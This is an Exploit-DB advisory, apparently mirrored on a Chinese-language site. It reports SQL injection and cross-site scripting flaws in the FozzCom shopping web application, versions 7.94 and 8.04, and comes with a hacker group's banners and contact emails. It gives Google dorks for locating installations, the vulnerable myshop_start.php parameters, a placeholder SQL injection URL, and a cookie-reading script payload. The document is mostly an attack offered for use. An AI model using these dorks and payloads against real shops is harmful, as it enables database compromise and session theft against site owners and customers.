Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities

  • 作者: Dr.0rYX & Cr3W-DZ
    日期: 2010-11-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15571/
  •  
 Exploit Title:FozzCom shopping<= 7.94+8.04Multiple Remote Vulnerabilities
 Date: 12.10.2010
 Author: Dr.0rYX and Cr3w-DZ
 Category: webapps/0day
 Version: 7.94+8.04

****************************************************************************************************
* _______ ___________.__ ___________.__*
*____ \ _\______\_____/||__ _____\_ _____/______|__| ____ _____*
* /\//_\\___ \|| ||\ ______ \__\|__) \___ \|/ ___\\__\ *
*| |\\_/ \| \/|| | Y\ /_____// __ \_| \ || \/\\___ / __ \_ *
*|___|/\_____/__| |____| |___|/ (____/\___/ |__||__|\___>____/ *
* \/ \/ \/ \/ \/\/ \/*
*.____ __*
*______ ____ ______ _________|__|/|_ ___.__. _/|_____ __________ *
* /___// __ \_/ ___\||\___ \\ __< || \ __\/ __ \\__\/ \*
* \___ \\___/\\___||/|| \/|||\___||| \___/ / __ \|Y Y\ *
*/____>\___>\___>____/ |__||__||__|/ ____||__|\___>____/__|_|/ *
* \/ \/ \/ \/ \/ \/\/*
*Pr!v8 Expl0iT AND t00l ** *
*ALGERIAN HACKERS*
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
 
[!]FozzCom shopping<= 7.94+8.04Multiple Remote Vulnerabilities 
[!] Author: Dr.0rYX and Cr3w-DZ
[!] MAIL: sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
 
***************************************************************************/
[!] notice :
 Dr.0rYX:MY OLD EMAIL VX3@HOTMAIL.DECLOSED
 MY NEW EMAIL ISSNIPER-DZ@HOTMAIL.DE

***************************************************************************/
[ Software Information ]
 
[+] Vendor : http://www.fozztech.se
[+] script : FozzCom shopping
[+] Download : http://www.fozztech.se (sell script )
[+] Vulnerability : SQL injection Vulnerability
xss Vulnerability
[+] Dork : inurl:"myshop_start.php?APPID="
[+] Dork :allintext:"Powered by FozzCom."
 
**************************************************************************/
[ Vulnerable File 1]
 
http://server/[path]/myshop_start.php?APPID=2&PRID=sql[N.A.S.T ]

[ Exploit 1 ]
 
http://server/myshop/myshop_start.php?APPID=2&PRID= SQL INJECTION 


*************************************************************************/
[ Vulnerable File 2]

http://server/[path]/myshop_start.php?APPID=xss[N.A.S.T ]

[ Exploit 2 ]
http://www.server/myshop/myshop_start.php?APPID='><script>alert(document.cookie)</script>

[GReet ]
 
[+] : Exploit-db.com , v4-team.com
    Python